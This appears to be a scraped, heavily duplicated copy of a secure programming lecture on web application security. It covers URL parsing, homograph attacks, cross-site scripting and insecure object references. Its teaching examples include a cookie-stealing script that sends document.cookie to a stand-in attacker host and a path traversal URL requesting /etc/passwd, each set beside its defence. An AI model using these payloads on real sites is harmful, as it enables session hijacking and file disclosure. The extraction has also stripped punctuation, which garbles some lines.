value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 15: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 16: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 17: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 18: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 19: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

